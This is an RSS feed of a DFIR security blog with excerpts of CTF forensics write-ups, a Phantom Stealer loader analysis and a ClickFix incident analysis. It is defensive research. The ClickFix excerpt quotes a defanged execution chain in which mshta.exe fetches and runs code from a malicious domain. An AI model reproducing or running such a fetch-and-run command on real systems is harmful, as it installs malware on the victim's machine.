<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Ahmad Massd — Security Blog</title><link>https://p0peye-blog.pages.dev/</link><description>Recent content on Ahmad Massd — Security Blog</description><generator>Hugo -- gohugo.io</generator><language>en</language><managingEditor>ahmad.massad.ir@gmail.com (Ahmad Massad)</managingEditor><webMaster>ahmad.massad.ir@gmail.com (Ahmad Massad)</webMaster><copyright>© 2026 Ahmad Massad</copyright><lastBuildDate>Wed, 20 Aug 2025 00:00:00 +0000</lastBuildDate><atom:link href="https://p0peye-blog.pages.dev/index.xml" rel="self" type="application/rss+xml"/><item><title>Aliens CTF — DFIR: 7 Oct</title><link>https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/</link><pubDate>Wed, 20 Aug 2025 00:00:00 +0000</pubDate><author>ahmad.massad.ir@gmail.com (Ahmad Massad)</author><guid>https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/</guid><description>&lt;h2 class="relative group"&gt;Challenge: 7 Oct
 &lt;div id="challenge-7-oct" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#challenge-7-oct" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;

&lt;h3 class="relative group"&gt;Description
 &lt;div id="description" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#description" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h3&gt;
&lt;blockquote&gt;&lt;p&gt;We stormed one of the enemy&amp;rsquo;s concentration areas and after completing the operation, we took some devices to investigate and obtain intelligence. One device belongs to a leader. We believe information is being leaked through a spy. Search the device to find the spy and location details — the enemy was planning a prisoner recovery operation and location information had been leaked to them.&lt;/p&gt;</description></item><item><title>Cyber Warriors CTF — Forensics: Investigation Nashmi APT</title><link>https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/</link><pubDate>Sat, 16 Aug 2025 00:00:00 +0000</pubDate><author>ahmad.massad.ir@gmail.com (Ahmad Massad)</author><guid>https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/</guid><description>&lt;p&gt;&lt;figure&gt;&lt;img
 class="my-0 rounded-md"
 loading="lazy"
 decoding="async"
 fetchpriority="low"
 alt=""
 src="https://miro.medium.com/v2/resize:fit:700/1*xmjWlgRCiaWpY7CiFRfAHg.png"
 &gt;&lt;/figure&gt;
&lt;/p&gt;

&lt;h2 class="relative group"&gt;Introduction
 &lt;div id="introduction" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#introduction" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;
&lt;p&gt;Our Security Operations Center (SOC) detected suspicious activity originating from an internal employee workstation. The employee — a finance team member — reported slow system performance and unexpected behavior. Shortly after, EDR logs showed signs of malware persistence and suspicious outbound traffic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mission:&lt;/strong&gt; Analyze a full memory image of the compromised machine, identify the scope of the infection, and answer key investigation questions.&lt;/p&gt;</description></item><item><title>The Anatomy of Phantom Stealer</title><link>https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/</link><pubDate>Thu, 10 Jul 2025 00:00:00 +0000</pubDate><author>ahmad.massad.ir@gmail.com (Ahmad Massad)</author><guid>https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/</guid><description>&lt;p&gt;&lt;figure&gt;&lt;img
 class="my-0 rounded-md"
 loading="lazy"
 decoding="async"
 fetchpriority="auto"
 alt="Phantom Stealer"
 width="1920"
 height="1080"
 src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png"
 srcset="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png 800w, https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_3c426dc241b76d8d.png 1280w"
 sizes="(min-width: 768px) 50vw, 65vw"
 data-zoom-src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image.png"&gt;&lt;/figure&gt;
&lt;/p&gt;

&lt;h2 class="relative group"&gt;Overview
 &lt;div id="overview" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#overview" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;
&lt;p&gt;Analysis of a malicious VBScript file (&lt;code&gt;LPO_337860.vbs.bin&lt;/code&gt;) acting as a loader for &lt;strong&gt;Phantom Infostealer&lt;/strong&gt;. The script employs heavy obfuscation, environmental checks, and persistence mechanisms.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sample Information&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
	&lt;thead&gt;
			&lt;tr&gt;
					&lt;th&gt;Field&lt;/th&gt;
					&lt;th&gt;Value&lt;/th&gt;
			&lt;/tr&gt;
	&lt;/thead&gt;
	&lt;tbody&gt;
			&lt;tr&gt;
					&lt;td&gt;Filename&lt;/td&gt;
					&lt;td&gt;&lt;code&gt;LPO_337860.vbs.bin&lt;/code&gt;&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
					&lt;td&gt;MD5&lt;/td&gt;
					&lt;td&gt;&lt;code&gt;074a04eafe704a893655025b80beffb6&lt;/code&gt;&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
					&lt;td&gt;File Type&lt;/td&gt;
					&lt;td&gt;VBScript&lt;/td&gt;
			&lt;/tr&gt;
			&lt;tr&gt;
					&lt;td&gt;Threat&lt;/td&gt;
					&lt;td&gt;Phantom Infostealer Loader&lt;/td&gt;
			&lt;/tr&gt;
	&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr&gt;

&lt;h2 class="relative group"&gt;Stage 0 — VBScript Loader (&lt;code&gt;LPO_337860.vbs.bin&lt;/code&gt;)
 &lt;div id="stage-0--vbscript-loader-lpo_337860vbsbin" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#stage-0--vbscript-loader-lpo_337860vbsbin" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;
&lt;p&gt;The initial VBScript acts as a &lt;strong&gt;deobfuscation and file-dropping engine&lt;/strong&gt; in two steps:&lt;/p&gt;</description></item><item><title>Claude Never Asked You to Run That</title><link>https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/</link><pubDate>Tue, 01 Jul 2025 00:00:00 +0000</pubDate><author>ahmad.massad.ir@gmail.com (Ahmad Massad)</author><guid>https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/</guid><description>&lt;h2 class="relative group"&gt;Incident Overview
 &lt;div id="incident-overview" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#incident-overview" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;
&lt;p&gt;While conducting a threat hunting deep dive into a resolved &lt;strong&gt;ClickFix&lt;/strong&gt; incident, I tracked the infection chain back to the landing domain &lt;code&gt;turbowave45[.]com&lt;/code&gt;. The original execution chain on the target Windows workstation was highly indicative of a modern social engineering / fake update lure:&lt;/p&gt;
&lt;div class="highlight-wrapper"&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chrome.exe → explorer.exe → powershell.exe → mshta.exe https://purematrixa[.]com/1751517&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The EDR flagged and killed the process at:&lt;/p&gt;</description></item><item><title>About</title><link>https://p0peye-blog.pages.dev/about/</link><pubDate>Wed, 01 Jan 2025 00:00:00 +0000</pubDate><author>ahmad.massad.ir@gmail.com (Ahmad Massad)</author><guid>https://p0peye-blog.pages.dev/about/</guid><description>&lt;h2 class="relative group"&gt;Hi, I&amp;rsquo;m Ahmad Massad
 &lt;div id="hi-im-ahmad-massad" class="anchor"&gt;&lt;/div&gt;
 
 &lt;span
 class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"&gt;
 &lt;a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#hi-im-ahmad-massad" aria-label="Anchor"&gt;#&lt;/a&gt;
 &lt;/span&gt;
 
&lt;/h2&gt;
&lt;p&gt;I&amp;rsquo;m a DFIR Investigator specializing in Windows internals, memory forensics, and kernel-level telemetry. Rooted in proactive threat hunting, my focus is on dissecting complex attacks, analyzing malware, and building custom defensive tools to get as close to the metal as possible. When I&amp;rsquo;m not deep in an investigation, I&amp;rsquo;m usually competing in CTFs, sharpening my reverse engineering skills, or hitting the weights at the gym. This space is my digital command center for sharing technical research, write-ups, and practical lessons learned from the trenches.&lt;/p&gt;</description></item></channel></rss>